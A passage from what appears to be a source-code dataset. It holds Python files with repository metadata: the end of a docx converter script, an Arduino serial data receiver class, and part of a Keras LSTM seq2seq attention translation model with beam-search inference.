datetime.fromtimestamp(os.path.getmtime(args.path)).strftime('%Y-%m-%d') #is_selected &= (mtime >= '2021-05-01') if is_valid and is_selected: with open(args.path, "rb") as docx_fileobj: if outdir is None: path, file = os.path.split(args.output) else: path, file = outdir, os.path.basename(args.output) output_path = os.path.join(path, file.replace(' ', '')) if args.stdout_write in ['true', 'only']: output_file = os.path.join(path, "format_errors.txt") if not os.path.exists(output_file): sys.stdout = open(output_file, 'a') if str(date.today()) not in open(output_file).readline(): sys.stdout = open(output_file, 'w') # reset print('{}\n'.format(date.today())) sys.stdout = open(output_file, 'a') print('see --> https://youtu.be/9HIv-R8lg9I <-- for explanations.\n\n') sys.stdout = open(output_file, 'a') result = convert(docx_fileobj).value if args.output.endswith('html'): title = args.output.split('/')[-1].strip('.html') result = style_mappings(result, title) elif args.output.endswith('md'): title = args.output.split('/')[-1].strip('.md') result = style_mappings(result, title) result = html2text(result) result = style_mappings_md(result) else: raise ValueError('File format not supported.') check_comments(args.path, title) if args.stdout_write != 'only': _write_output(output_path, result) def _write_output(path, contents): with io.open(path, "w", encoding="utf-8") as fileobj: fileobj.write(contents) def _parse_args(): parser = argparse.ArgumentParser() parser.add_argument( "path", metavar="docx-path", help="Path to the .docx file to convert.") parser.add_argument( "output", nargs="?", metavar="output-path", help="Output path for the generated document.") parser.add_argument( "--input-dir", help="Input directory for generated HTML.") parser.add_argument( "--output-dir", help="Output directory for generated HTML.") parser.add_argument( "--stdout-write", help="Output filepath for generated error messages.") return parser.parse_args() if __name__ == "__main__": main()
33.699248
109
0.572735
e30c668146f5292adf9d8941078d876c3b4b49d3
5,250
py
Python
ArduinoToPiDataTransfer/PiDataReceiverGeneric.py
Robsen01/Brain_Interface
2525dc5e90bc5ac6b67f8f596fdf26a9ae6b391e
[ "Apache-2.0" ]
null
null
null
ArduinoToPiDataTransfer/PiDataReceiverGeneric.py
Robsen01/Brain_Interface
2525dc5e90bc5ac6b67f8f596fdf26a9ae6b391e
[ "Apache-2.0" ]
null
null
null
ArduinoToPiDataTransfer/PiDataReceiverGeneric.py
Robsen01/Brain_Interface
2525dc5e90bc5ac6b67f8f596fdf26a9ae6b391e
[ "Apache-2.0" ]
null
null
null
from time import sleep, time_ns import serial import serial.tools.list_ports import math ''' PiDataReceiverGeneric has everything you need to communicate with the Arduino. ''' class PiDataReceiverGeneric: ''' port must be a string like 'COM3'. Retrieve possible ports with PiDataReceiver.list_possible_ports. ''' def __init__(self, port, threshold, baudrate=115200, timeout=.1, send_raw_data=False, send_filtered_data=False, send_envlope=True, data_separation=",") -> None: self.arduino = serial.Serial(port=port, baudrate=baudrate, timeout=timeout) self.send_raw_data = send_raw_data self.send_filtered_data = send_filtered_data self.send_envlope = send_envlope self.data_separation = data_separation self.threshold = threshold ''' Closes the potentialy open port to the arduino that may be connected. Should be called, before disposing this object ''' def close_arduino_port(self): if hasattr(self, "arduino"): if not self.arduino.closed: self.arduino.close() ''' Wait a bit to call this function after PiDataReceiver was initiated. 2-3 Seconds is good. This sends a string to the Arduino to configure it. Returns true, if the Arduino responded that all is well. ''' def init_arduino(self) -> bool: self.clear_arduino_buffer() d = self.data_separation if(self.send_raw_data): d += "1" else: d += "0" if(self.send_filtered_data): d += "1" else: d += "0" if(self.send_envlope): d += "1" else: d += "0" if(self.threshold and type(self.threshold) == int and self.threshold > 0): d += str(self.threshold) else: d+= "0" self.write(d) self.arduino.flushOutput() # wait till response, there will be some empty lines before the response. The loop reads them out, until the response arrives time = time_ns() data = "" while data != "all good": data = self.arduino.readline() data = data.decode('utf-8') data = data.strip() # wait max 1.5 s for response (takes almost exactly 1s on my machine) if time_ns() - time > 1500000000: break if data == "all good": return True return False ''' This function writes a string to the Arduino. ''' def write(self, s) -> None: self.arduino.write(bytes(s, 'utf-8')) ''' Reads last line that arduino send. Returns list of int. List may contain raw_data, filtered_data, envlope, depending on send_raw_data and the other attributes. The last value is a Timestamp of the moment when the analoge value was read. ''' def read(self): try: data = self.arduino.readline() data = data.decode('utf-8') data = data.split(self.data_separation) data = list(map(int, data)) # convert strings-list to int-list except: # when getting started Arduino sends some setup lines. This helps to ignore them data = [] return data ''' Should be called before you start to read or write values for the first time after a connect, in case there are still old values in the buffer. ''' def clear_arduino_buffer(self) -> None: self.arduino.reset_input_buffer() self.arduino.reset_output_buffer() ''' staticmethod Returns list with items like this: ('COM3', 'Arduino Due Programming Port (COM3)', 'USB VID:PID=2341:003D SNR=75330303035351300230') The first String in this list that represents the Arduino must be used for the port-parameter of PiDataReceiverGeneric ''' @staticmethod def list_possible_ports(): return list(serial.tools.list_ports.comports()) ''' staticmethod should be used to convert the recieved timestamp from nanoseconds to seconds ''' @staticmethod def time_to_s(ns_value) -> float: # /1000000 converts the nanoseconds to seconds return ns_value/1000000 ''' staticmethod converts the raw integer to the measured mV value ''' @staticmethod def raw_to_mV(value) -> float: # https://www.arduino.cc/reference/en/language/functions/analog-io/analogread/ # value*(5/1024) - 1.5 # value[total steps measured by the adc.] *(5/1024)[1 step of the adc. in V] - 1.5[the Sensor maps the detectionrange of +/- 1,5mV to a positive range between 0-3V. We reverse that here] # the result is a value between -1.5mV and + 1.5mV return value*5/1024 - 1.5 ''' staticmethod converts the raw integer to the measured mV value ''' @staticmethod def filtered_to_mV(value) -> float: # https://www.arduino.cc/reference/en/language/functions/analog-io/analogread/ # value*(5/1024) # value[total steps measured by the adc. and filtered] *(5/1024)[1 step of the adc. in V] # the result is a value roughly between -1.5mV and + 1.5mV. return value*5/1024
34.313725
195
0.62419
8bc4e1cbae7913cb418e025dd446d4bbf461bd0f
46,469
py
Python
MachineTranslation/src_bak/attention/v1/machine_translation_with_attention_xrh.py
Xinrihui/DeepLearningApp
8d86b88251ee8d37358c642b1ec4a341767bfd17
[ "Apache-2.0" ]
2
2021-08-25T01:13:29.000Z
2021-10-10T14:49:59.000Z
MachineTranslation/src_bak/attention/v1/machine_translation_with_attention_xrh.py
Xinrihui/DeepLearningApp
8d86b88251ee8d37358c642b1ec4a341767bfd17
[ "Apache-2.0" ]
null
null
null
MachineTranslation/src_bak/attention/v1/machine_translation_with_attention_xrh.py
Xinrihui/DeepLearningApp
8d86b88251ee8d37358c642b1ec4a341767bfd17
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # -*- coding: UTF-8 -*- # 适用于 tensorflow >= 2.0, keras 被直接集成到 tensorflow 的内部 # ref: https://keras.io/about/ from tensorflow.keras.layers import Bidirectional, Concatenate, Dot, Input, LSTM from tensorflow.keras.layers import RepeatVector, Dense, Lambda, Softmax, Reshape from tensorflow.keras.optimizers import Adam from tensorflow.keras.models import Model from tensorflow.keras.utils import plot_model from src_bak.attention.v1.lib.nmt_utils import * from src_bak.attention.v1.lib.utils_xrh import * from sklearn.model_selection import train_test_split from lib.bleu_xrh import * from deprecated import deprecated @deprecated(version='0.0', reason="You should use class MachineTranslationV1") class BasicMachineTranslation: """ 基于 LSTM + seq2seq + attention 的翻译模型 基础的面向过程实现 Author: xrh Date: 2019-12-16 ref: https://github.com/enggen/Deep-Learning-Coursera """ def model_implementation_naive(self, Tx, Ty, machine_vocab, human_vocab, Xoh, Yoh, m): # 对于 attention 模块, 使用全局的 网络层(Keras Layers) 对象,以在多个 model 中共享权重 repeator = RepeatVector(Tx) concatenator = Concatenate(axis=2) densor = Dense(1, activation="relu") activator = Softmax(axis=1) dotor = Dot(axes=1) def one_step_attention(a, s_prev): # 与RNN 类似,是一个 循环结构 """ attention 模块的实现 使用全局的 网络层(Keras Layers) 对象,以在多个 model 中共享权重 :param a: encoder-lstm 所有时间步的输出 shape (m, Tx, 2*n_a) :param s_prev: decoder-lstm 中上一个时间步的 隐藏状态 shape (m, n_s) :return: """ s_prev = repeator(s_prev) concat = concatenator([a, s_prev]) # shape: (m, Tx, 2*n_a+n_s) e = densor(concat) # shape: (m, Tx, 1) alphas = activator(e) # shape: (m, Tx, 1) context = dotor([alphas, a]) # shape: (m, 1, 2*n_a) return context n_a = 64 n_s = 128 pre_activation_LSTM_cell = Bidirectional(LSTM(n_a, return_sequences=True, return_state=True)) # ref: https://keras.io/api/layers/recurrent_layers/lstm/#lstm-class # ref: https://keras.io/api/layers/recurrent_layers/bidirectional/ post_activation_LSTM_cell = LSTM(n_s, return_state=True) output_layer = Dense(len(machine_vocab), activation='softmax') def model(Tx, Ty, n_a, n_s, human_vocab_size): """ 实现 encoder 和 decoder :param Tx: 输入序列的长度 :param Ty: 输出序列的长度 :param n_a: encoder-lstm 中隐藏状态的维度 :param n_s: decoder-lstm 中隐藏状态的维度 :param human_vocab_size: 输入序列的字典大小 :return: Keras model instance """ # 定义模型的输入 X = Input(shape=(Tx, human_vocab_size)) # shape: (m,Tx,human_vocab_size) , m- batch 大小 # decoder-LSTM 的初始状态 # 隐藏状态向量 hidden state s0 = Input(shape=(n_s,), name='s0') # shape of s: (m, n_s=64) # 细胞状态向量 c0 = Input(shape=(n_s,), name='c0') # shape of c: (m, n_s=64) s = s0 c = c0 outputs = [] # lstm-encoder 实现 a, forward_h, forward_c, backward_h, backward_c = pre_activation_LSTM_cell( inputs=X) # shape of a : (m,Tx, 2*n_a) # lstm-decoder 实现 # 对Ty 时间步进行展开,由于每次只运行一个 时间步 所以要输出 hidden state 和 cell state 作为下一个时间步的LSTM的输入 for t in range(Ty): context = one_step_attention(a, s) # shape: (m, 1, 2*n_a) # shape of s: (m, n_s) s, _, c = post_activation_LSTM_cell(inputs=context, initial_state=[s, c]) # 输入只有一个时间步 out = output_layer(s) # shape: (m, machine_vocab) outputs.append(out) model = Model(inputs=[X, s0, c0], outputs=outputs) # shape of outs : ( Ty, m, machine_vocab) return model model = model(Tx, Ty, n_a, n_s, len(human_vocab)) opt = Adam(lr=0.005, beta_1=0.9, beta_2=0.999, decay=0.01) model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy']) # tips : # n_a = 64 # n_s = 128 # m = 10000 outputs = list(Yoh.swapaxes(0, 1)) # Yoh.swapaxes(0,1) 第0维度 和 第1 维度交换,原来为(m,T_y,11) 变换后 为:(T_y,m,11) s0 = np.zeros((m, n_s)) c0 = np.zeros((m, n_s)) history = model.fit([Xoh, s0, c0], outputs, epochs=40, batch_size=2048, validation_split=0.1) class MachineTranslationV1: """ 基于 LSTM + seq2seq + attention 的翻译模型 对比 class BasicMachineTranslation 改进如下: 1. 面向对象实现 2. 更改了 attention 机制 (1) 对于 decoder, 第一个时间步的输入的 隐藏状态向量(s) 和 细胞状态向量(c) 为 encoder 最后一个时间步的输出 (2) 对于 decoder, 每一个时间步的输入除了 attention 模块对 encoder 所有时间步的输出的加权和 之外, 还引入了 decoder 上一个时间步的输出 3. 基于 beamsearch 的推理 (1) 实现了 encoder 和 decoder 的解耦, 提升推理速度 (2) decoder 采用分时间步解码的方式, 即每一个时间步做一次模型的推理得到解码结果 Author: xrh Date: 2019-12-16 ref: 1.https://github.com/enggen/Deep-Learning-Coursera 2.论文 Neural machine translation by jointly learning to align and translate """ def __init__(self, Tx, Ty, n_a, n_s, machine_vocab, inv_machine_vocab, human_vocab, use_pretrain=False, model_path='models/lstm_seq2seq_attention.h5'): """ 模型初始化 :param Tx: 输入序列的长度 :param Ty: 输出序列的长度 :param n_a: encoder-lstm 中隐藏状态的维度 n_a = 64 :param n_s: decoder-lstm 中隐藏状态的维度 n_s = 128 :param machine_vocab: 输出序列的字典 :param inv_machine_vocab: 输出序列的逆字典 :param human_vocab: 输入序列的字典 :param use_pretrain: 使用训练好的模型 :param model_path: 预训练模型的路径 """ self.Tx = Tx self.Ty = Ty self.n_a = n_a self.n_s = n_s self.machine_vocab = machine_vocab self.inv_machine_vocab = inv_machine_vocab self.human_vocab = human_vocab self.model_path = model_path # 输出序列的字典大小 self.machine_vocab_size = len(machine_vocab) # 输入序列的字典大小 self.human_vocab_size = len(human_vocab) # 对组成计算图的所有网络层进行声明和初始化 self.__init_computation_graph() # 用于训练的计算图 self.model_train = self.__encoder_decoder_model(Tx=self.Tx, Ty=self.Ty, human_vocab_size=self.human_vocab_size) if use_pretrain: # 载入训练好的模型 print('load pretrained model sucess ') self.model_train.load_weights(self.model_path) def __init_computation_graph(self): """ 对组成计算图的所有网络层进行声明和初始化 :return: """ # Model 也可以作为一个网络层 self.model_one_step_attention = self.__one_step_attention_model(self.Tx, self.n_a, self.n_s) self.pre_activation_LSTM_cell = Bidirectional(LSTM(self.n_a, return_sequences=True, return_state=True), name='encoder_lstm') self.concatenate_s = Concatenate(name='concatenate_s') self.concatenate_c = Concatenate(name='concatenate_c') self.concatenate_context = Concatenate() self.post_activation_LSTM_cell = LSTM(self.n_s, return_state=True, name='decoder_lstm') self.output_layer = Dense(len(self.machine_vocab), activation='softmax', name='decoder_output') self.lambda_argmax = Lambda(TensorUtils.argmax_tensor, arguments={'axis': -1}, name='argmax_tensor') self.lambda_one_hot = Lambda(TensorUtils.one_hot_tensor, arguments={'num_classes': len(self.machine_vocab)}, name='one_hot_tensor') self.reshape = Reshape(target_shape=(1, len(self.machine_vocab))) def __one_step_attention_model(self, Tx, n_a, n_s): """ attention 模块的实现 把 几个网络层(keras layer) 包装为 model ,并通过重新定义 model 的输入的方式 来共享 layer 的权重 :param Tx: 输入序列的长度 :param n_a: encoder-lstm 中隐藏状态的维度 :param n_s: decoder-lstm 中隐藏状态的维度 :return: keras model model inputs: [a0, s_prev0] model outputs : context 向量, 作为 decoder-lstm 的输入 shape: (m, 1, 2*n_a) """ repeator = RepeatVector(Tx) concatenator = Concatenate(axis=2) densor = Dense(1, activation="relu") activator = Softmax(axis=1) dotor = Dot(axes=1) a0 = Input(shape=(Tx, 2 * n_a), name='a') # shape: (m, Tx, 2 * n_a) s_prev0 = Input(shape=(n_s,), name='s_prev') # shape: (m, Tx, n_s) a = a0 # 否则报错 : ValueError: Graph disconnected: cannot obtain value for tensor Tensor .... # The following previous layers were accessed without issue: [] s_prev = s_prev0 s_prev = repeator(s_prev) # shape: (m, Tx, n_s) concat = concatenator([a, s_prev]) # shape: (m, Tx, 2*n_a+n_s) e = densor(concat) # shape: (m, Tx, 1) alphas = activator(e) # shape: (m, Tx, 1) context = dotor([alphas, a]) # shape: (m, 1, 2*n_a) model = Model(inputs=[a0, s_prev0], outputs=context) # Model 也可以作为一个网络层 return model def __encoder_decoder_model(self, Tx, Ty, human_vocab_size): """ 实现 encoder 和 decoder 1. 解码时加入上一个时刻的输出单词, 考虑场景: 若前一个时刻的词是 '-', 则当前词必须为数字 在 decoder中, 经过 softmax 输出后 取最大的 那一个字符的 one-hot 向量 与 context 拼接后输入 decoder-lstm 2. 修改 decoder-LSTM 的初始 隐藏状态的输入 ,由原来的 0 向量,改为 encoder-LSTM 最后一个时间步的隐状态(注意进行拼接) 3. 把所有的 keras layer object 声明为类变量,以便 后面重构 decoder 可以使用训练好的网络结构 :param Tx: 输入序列的长度 :param Ty: 输出序列的长度 :param human_vocab_size: 输入序列的字典大小 :return: Keras model instance """ X = Input(shape=(Tx, human_vocab_size)) # shape: (m,Tx,human_vocab_size) pred0 = Input(shape=(1, self.machine_vocab_size), name='pred0') # shape: (m ,1, 11) pred = pred0 # print('pred: after Input', pred) outputs = [] # lstm-encoder a, forward_h, forward_c, backward_h, backward_c = self.pre_activation_LSTM_cell( inputs=X) # shape of a : (m,Tx, 2*n_a) # 最后一个时间步的 隐藏状态向量 s = self.concatenate_s(inputs=[forward_h, backward_h]) # shape (m, 2*n_a=128) # 最后一个时间步的 细胞状态向量 c = self.concatenate_c(inputs=[forward_c, backward_c]) # shape (m, 2*n_a=128) # lstm-decoder for t in range(Ty): # 遍历 Ty 个时间步 context = self.model_one_step_attention(inputs=[a, s]) # shape of context : (m, 1, 2*n_a=128) # print('context after one_step_attention: ', context) context = self.concatenate_context(inputs=[context, pred]) # shape of context: (m,1,128+11=139) # print('context after Concatenate: ', context) s, _, c = self.post_activation_LSTM_cell(inputs=context, initial_state=[s, c]) # 输入 context 只有1个时间步 out = self.output_layer(inputs=s) # shape (m, machine_vocab) pred = self.lambda_argmax(inputs=out) # shape (m, 1) pred = self.lambda_one_hot(inputs=pred) # shape (m, machine_vocab_size) # print(pred) pred = self.reshape(inputs=pred) # shape: (m ,1, machine_vocab_size) # print(pred) outputs.append(out) # shape : (Ty, m, machine_vocab_size) model = Model(inputs=[X, pred0], outputs=outputs) # shape of outputs : ( Ty ,m ,machine_vocab) return model def fit(self, Xoh, Yoh, epoch_num=120, batch_size=2048): """ 训练模型 :param Xoh: 输入序列 (one-hot化) :param Yoh: 输出序列 (one-hot化) :param epoch_num: 模型训练的 epoch 个数, 一般训练集所有的样本模型都见过一遍才算一个 epoch :param batch_size: 选择 min-Batch梯度下降时, 每一次输入模型的样本个数 (默认 = 2048) :return: """ m = np.shape(Xoh)[0] # 训练样本总数 model = self.__encoder_decoder_model(self.Tx, self.Ty, self.human_vocab_size) # 打印 模型(计算图) 的所有网络层 # print(model.summary()) # 画出计算图 # plot_model(model, to_file='doc/model2.png') opt = Adam(lr=0.005, beta_1=0.9, beta_2=0.999, decay=0.01) model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy']) outputs = list(Yoh.swapaxes(0, 1)) # Yoh.swapaxes(0,1) 第0维度 和 第1 维度交换,原来为(m,T_y,11) 变换后 为:(T_y,m,11) pred0 = np.zeros((m, 1, self.machine_vocab_size)) history = model.fit([Xoh, pred0], outputs, epochs=epoch_num, batch_size=batch_size, validation_split=0.1) # 将训练好的模型保存到文件 model.save(self.model_path) print('save model sucess ') def __inference_encoder_model(self, Tx, human_vocab_size): """ 推理过程中 解耦后的 encoder :param Tx: 输入序列的长度 :param human_vocab_size: 输入序列的字典大小 :return: model -- Keras model instance """ X = Input(shape=(Tx, human_vocab_size)) # shape: (N,Tx,human_vocab_size) # 使用 已经训练好的 网络层 a, forward_h, forward_c, backward_h, backward_c = self.pre_activation_LSTM_cell( inputs=X) # shape of a : (N, Tx, 2*n_a) # encoder 最后一个时间步的 隐藏状态向量 s = self.concatenate_s([forward_h, backward_h]) # shape of s: (N, n_a+n_a) = (m,128) # encoder 最后一个时间步的 细胞状态向量 c = self.concatenate_c([forward_c, backward_c]) # context = self.model_one_step_attention(inputs=[a, s]) # shape of context : (N, 1, 128) outputs = [a, s, c] model = Model(inputs=[X], outputs=outputs) # 生成计算图(模型) return model def __inference_onestep_decoder_model(self, n_s, Tx): """ 推理过程中 解耦后的 一个时间步的 decoder :param n_s: decoder-lstm 中隐藏状态的维度 :return: model -- Keras model instance """ a = Input(shape=(Tx, n_s), name='a') # shape (N, Tx, 2*n_a) # 输入的隐藏状态向量 s0 = Input(shape=(n_s,), name='s') # shape of s: (m, n_s=64) # 输入的细胞状态向量 c0 = Input(shape=(n_s,), name='c') # shape of c: (m, n_s=64) # decoder 中上一个时间步的输出 pred = Input(shape=(1, self.machine_vocab_size), name='pred') # shape of pred (m ,1, 11) s = s0 # unmutable object: a new tensor is generated c = c0 # print('pred: after Input',pred) context = self.model_one_step_attention(inputs=[a, s]) # shape of context : (m, 1, 2*n_a=128) # print('context after one_step_attention: ', context) context = self.concatenate_context(inputs=[context, pred]) # shape of context: (m,128+11=139) s, _, c = self.post_activation_LSTM_cell(inputs=context, initial_state=[s, c]) # s 最后一个时间步的隐藏状态向量 shape (m, n_s) # c 最后一个时间步的细胞状态向量 shape (m, n_s) out = self.output_layer(inputs=s) # shape (m, machine_vocab_size) outputs = [s, c, out] # 输出 s c out 作为下一个时间步使用 model = Model(inputs=[a, s0, c0, pred], outputs=outputs) # 生成计算图(模型) return model def __inference_beamsearch(self, source_oh, Tx, Ty, n_s, human_vocab_size, machine_vocab_size, k=3): """ 实现 beamsearch (带窗口的贪心搜索) np.array -> tensor 很自然, 但是 tensor -> np.array 的方式: K.eval(tensor) 需要启动框架计算 计算图, 非常耗费时间; 尽量多用 numpy 的函数,以减少 tensor 到 np.array 的转换的次数 :param source_oh: 输入序列(one-hot化) :param Tx: 输入序列的长度 :param Ty: 输出序列的长度 :param n_s: decoder-lstm 中隐藏状态的维度 :param human_vocab_size: 输入序列的字典大小 :param machine_vocab_size: 输出序列的字典大小 :param k: 窗口大小 :return: decoder_result """ pred0 = np.zeros((k, 1, self.machine_vocab_size)) pred = pred0 decoder_result = [] # encoder 和 decoder 的解耦 encoder = self.__inference_encoder_model(Tx, human_vocab_size) context, s, c = encoder.predict([source_oh]) # source_oh shape:(m=3, Tx=30, human_vocab_size=37) # shape of context : (m, 1, 2*n_a=128) # shape of s: (m, 2*n_a) # shape of c: (m, 2*n_a) # bearmserach decoder 实现 for timestep in range(Ty): # print('timestep :', timestep) onestep_decoder = self.__inference_onestep_decoder_model(n_s, Tx) s, c, out = onestep_decoder.predict([context, s, c, pred]) # out: softmax 层输出的为 11 个分类的概率 shape (m=3, machine_vocab_size=11) 输入的样本数量为3 # s 最后一个时间步的隐藏状态向量 shape (m, n_s) # c 最后一个时间步的细胞状态向量 shape (m, n_s) # print('out: \n', out) # shape:(3, 11) # 每次都对 3个相同的样本(k=3)进行 推理,但是每一个 样本对应的 pred 不同 ; # beamsearch 中,每一个时间步都会根据上一步的 onestep_decoder 输出结果中 选择最好的k个, 输入此时间步的 onestep_decoder if timestep == 0: out_top_K = ArrayUtils.partition_topk_array(out, k) # shape:(3,3) 每一行为 k 个标号, 表示从每个样本的11个分类中选出概率最大的 3个 类别 # print('out_top_K: \n', out_top_K) top_K_indices = out_top_K r0 = top_K_indices[0] # shape:(1,3) 因为3个输入样本是一样的,取其中一个即可 r0 = np.reshape(r0, (k, 1)) # shape:(3,1) decoder_result = r0 one_hot = ArrayUtils.one_hot_array(r0.reshape(-1), machine_vocab_size) # shape:(3,11) # 把 r0.reshape(-1) shape:(3,) 最后一个维度 变为 one-hot 向量 # print(one_hot) one_hot = np.reshape(one_hot, (1, one_hot.shape[0], one_hot.shape[1])) # shape:(1,3,11) one_hot_permute = one_hot.transpose((1, 0, 2)) # shape: (3,1,11) ; # 交换 第0维 和 第1维,相当于3个不同的 pred 同时输入下一个时间步的 onestep_decoder pred = one_hot_permute else: out_top_K = ArrayUtils.whole_topk_array(out, k) # shape:(3, 2) 找出 out (shape (3,11)) 中33 个元素中的k个最大的元素的标号(位置) # out shape:(3, 11) r = out_top_K # print('r: \n', r) # [[1 1] # [0 1] # [2 1]] # topk 的元素在out中的标号为 [2,1], 代表 第2个输入的pred 所输出的11个分类中的第1个类别 r_pre = decoder_result # shape:(k,timestep) 上一步 解码的结果 即是 这一步的输入 # [[2] # [1] # [3]] rt = np.zeros((k, timestep + 1), dtype=np.int32) # 这一步 会在上一步 已有的解码序列的基础上 增加1个 解码位 for i in range(k): rt[i, :] = np.concatenate((r_pre[r[i][0]], [r[i][1]]), axis=0) # i=2: # r[2][0]=2 说明是第2个输入的pred,前一步的解码情况为: r_pre[r[2][0]]=[3] , # 再连接上这一步的解码位 r[2][1]=1 得到 解码序列:[3,1] # 一共k 个解码序列 组成 rt decoder_result = rt # decoder_result: # [[1 1] # [2 1] # [3 1]] one_hot = ArrayUtils.one_hot_array(decoder_result[:, -1], machine_vocab_size) # shape:(3, 11) # print(one_hot.shape) one_hot = np.reshape(one_hot, (1, one_hot.shape[0], one_hot.shape[1])) # shape:(1,3, 11) one_hot_permute = one_hot.transpose((1, 0, 2)) # shape: (3,1,11) pred = one_hot_permute # print('decoder_result: \n', decoder_result) return decoder_result def inference(self, example): """ 使用训练好的模型进行推理 :param example: 样本序列 :return: """ source = np.array(string_to_int(example, self.Tx, self.human_vocab)) source_oh = ArrayUtils.one_hot_array(source, nb_classes=self.human_vocab_size) # beamsearch 的窗口大小 k = 3 source_oh = source_oh.reshape(1, source_oh.shape[0], source_oh.shape[1]) # print(source_oh.shape) source_oh = np.repeat(source_oh, k, axis=0) # print(source_oh.shape) #(3, 30, 37) m=k=3 将一个样本复制为3个, 输入模型进行推理 decoder_result = self.__inference_beamsearch(source_oh=source_oh, Tx=self.Tx, Ty=self.Ty, n_s=self.n_s, human_vocab_size=self.human_vocab_size, machine_vocab_size=self.machine_vocab_size, k=k) candidates = [] for prediction in decoder_result: output = ''.join(int_to_string(prediction, self.inv_machine_vocab)) # print("source:", example) # print("output:", output) candidates.append(output) return candidates @deprecated(version='1.0', reason="You should use another function") def evaluate_deprecated(self, source_list, reference_list): """ 使用 bleu 对翻译结果进行评价 :param source_list: 待翻译的句子的列表 :param reference_list: 对照语料, 人工翻译的句子列表 :return: average_bleu_score : 所有 source 的最佳翻译结果的平均分数 ; best_result_list : 所有 source 的最佳翻译结果 best_result = (max_bleu_score, source, reference, best_candidate) """ bleu_score_list = np.zeros(len(source_list)) best_result_list = [] for i in range(len(source_list)): source = source_list[i] # "3rd of March 2002" reference = reference_list[i] # "2002-03-03" candidates = self.inference(source) # ['2002-03-03', '0002-03-03', '1002-03-03'] max_bleu_score = float('-inf') # 最佳分数 best_candidate = None # 最好的翻译结果 reference_arr = reference.split('-') # 对 reference 切分(分隔符为 '-' )为 ['2002','03','03'] for candidate in candidates: # 遍历所有的 candidate, 找到 分数最高的 candidate_arr = candidate.split('-') # 对 candidate 切分(分隔符为 '-' )为 ['2002','03','03'] bleu_score = BleuScore.compute_bleu_corpus([[reference_arr]], [candidate_arr], N=2)[0] # bleu_score = corpus_bleu([[reference_arr]], [candidate_arr], weights=(0.5, 0.5, 0, 0)) # 因为 reference_arr 的长度为3 , 很容易导致 3-gram-precision=0, # 根据 bleu 计算公式 log(0) -> -inf, 导致bleu=0; # weights=(0.5, 0.5, 0, 0) 表示 只考虑 1-gram-precision 和 2-gram-precision 的对数加权和 if bleu_score > max_bleu_score: max_bleu_score = bleu_score best_candidate = candidate bleu_score_list[i] = max_bleu_score best_result = (max_bleu_score, source, reference, best_candidate) print('i:{}, best_result:{}'.format(i,best_result)) best_result_list.append(best_result) average_bleu_score = np.average(bleu_score_list) return average_bleu_score, best_result_list def evaluate(self, source_list, reference_list): """ 使用 bleu 对翻译结果进行评价 1.推理时采用 beamsearch (窗口大小 k = 3), 我们取 bleu 得分最高的作为此样本的预测序列 2.词元(term)的粒度 (1) '1990-09-23' 使用分隔符 '-' 切分为 3个 term ['1990','09','23'], 计算 bleu 时设置 N_gram 的长度上限为 2(仅仅考虑 1-gram, 2-gram) (2) '1978-12-21' 切分为 10个 term ['1', '9', '7', '8', '-', '1', '2', '-', '2', '1'] :param source_list: 待翻译的句子的列表 :param reference_list: 对照语料, 人工翻译的句子列表 :return: average_bleu_score : 所有 source 的最佳翻译结果的平均分数 ; best_result_list : 所有 source 的最佳翻译结果 best_result = (max_bleu_score, source, reference, best_candidate) """ bleu_score_list = np.zeros(len(source_list)) best_result_list = [] for i in range(len(source_list)): source = source_list[i] # "3rd of March 2002" reference = reference_list[i] # "2002-03-03" candidates = self.inference(source) # ['2002-03-03', '0002-03-03', '1002-03-03'] # reference_arr = reference.split('-') # 使用分隔符为 '-', 对 reference 切分为 ['2002','03','03'] # candidate_arr_list = [candidate.split('-')for candidate in candidates] reference_arr = list(reference) candidate_arr_list = [list(candidate) for candidate in candidates] candidates_bleu_score = BleuScore.compute_bleu_corpus( [[reference_arr]]*len(candidates), candidate_arr_list, N=4) max_bleu_score = np.max(candidates_bleu_score) best_idx = np.argmax(candidates_bleu_score) bleu_score_list[i] = max_bleu_score best_candidate = candidates[best_idx] best_result = (max_bleu_score, source, reference, best_candidate) print('i:{}, best_result:{}'.format(i,best_result)) best_result_list.append(best_result) average_bleu_score = np.average(bleu_score_list) return average_bleu_score, best_result_list class MachineTranslationV2: """ 基于 LSTM + seq2seq + attention 的翻译模型 对比 class BasicMachineTranslation 改进如下: 1. 采用面向对象实现 2. 更改了 attention 机制 (1) 对于 decoder, 第一个时间步的输入的 隐藏状态向量(s) 和 细胞状态向量(c) 为 encoder 最后一个时间步的输出 (2) 对于 decoder, 每一个时间步的输入除了 attention 模块对 encoder 所有时间步的输出的加权和 之外, 还引入了 decoder 上一个时间步的输出 3. 基于 beamsearch 的推理 (1) decoder 采用一体化模型解码的方式, 即构建推理计算图, 一次推理拿到所有时间步的结果 Author: xrh Date: 2019-12-16 ref: 1.https://github.com/enggen/Deep-Learning-Coursera 2.论文 Neural machine translation by jointly learning to align and translate """ def __init__(self, Tx, Ty, n_a, n_h, vocab_target, inv_vocab_target, vocab_source, k=3, use_pretrain=False, model_path='models/lstm_seq2seq_attention.h5'): """ 模型初始化 :param Tx: 编码器输入序列的长度 :param Ty: 解码器输出序列的长度 :param n_a: encoder-lstm 中隐藏状态的维度 n_a = 64 :param n_h: decoder-lstm 中隐藏状态的维度 n_h = 128 :param vocab_target: 输出序列的字典 :param inv_vocab_target: 输出序列的逆字典 :param vocab_source: 输入序列的字典 :param k: 模型推理时 beamsearch 的窗口 :param use_pretrain: 使用训练好的模型 :param model_path: 预训练模型的路径 """ self.Tx = Tx self.Ty = Ty self.n_a = n_a self.n_h = n_h self.vocab_target = vocab_target self.inv_vocab_target = inv_vocab_target self.vocab_source = vocab_source self.k = k self.model_path = model_path # 输出序列的字典大小 self.vocab_target_size = len(vocab_target) # 输入序列的字典大小 self.vocab_source_size = len(vocab_source) # 对组成计算图的所有网络层进行声明和初始化 self.__init_computation_graph() # 用于训练的计算图 self.model_train = self.train_model() # 用于推理的计算图 self.infer_model = self.inference_model() if use_pretrain: # 载入训练好的模型 print('load pretrained model sucess ') self.model_train.load_weights(self.model_path) def __init_computation_graph(self): """ 对组成计算图的所有网络层进行声明和初始化 :return: """ # Model 也可以作为一个网络层 self.model_one_step_attention = self.__one_step_attention_model(self.Tx, self.n_a, self.n_h) self.pre_activation_LSTM_cell = Bidirectional(LSTM(self.n_a, return_sequences=True, return_state=True), name='encoder_lstm') self.concatenate_h = Concatenate(name='concatenate_h') self.concatenate_c = 